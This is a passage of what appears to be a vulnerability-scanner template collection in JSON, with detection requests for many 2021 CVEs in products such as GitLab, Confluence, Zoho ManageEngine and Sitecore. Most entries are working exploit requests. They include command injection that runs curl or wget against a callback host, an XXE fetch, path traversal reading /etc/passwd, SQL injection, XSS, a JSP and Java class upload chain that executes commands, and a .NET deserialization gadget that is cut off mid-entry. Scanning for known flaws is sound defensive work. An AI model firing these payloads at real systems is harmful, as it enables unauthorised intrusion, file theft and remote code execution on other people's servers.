/{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-39211","info":{"name":"GLPI 9.2/<9.5.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/telemetry.php","{{BaseURL}}/glpi/ajax/telemetry.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"uuid\":","\"glpi\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-41291","info":{"name":"ECOA Building Automation System - Directory Traversal Content Disclosure","severity":"high"},"requests":[{"raw":["GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" 